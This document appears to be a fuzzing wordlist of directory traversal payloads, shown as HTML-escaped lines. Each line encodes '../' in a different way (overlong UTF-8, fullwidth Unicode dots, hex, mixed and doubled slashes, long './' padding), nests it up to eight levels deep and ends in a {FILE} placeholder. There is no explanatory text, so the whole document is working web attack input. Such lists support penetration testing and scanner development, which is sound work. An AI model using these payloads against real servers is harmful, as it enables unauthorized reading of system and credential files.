..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
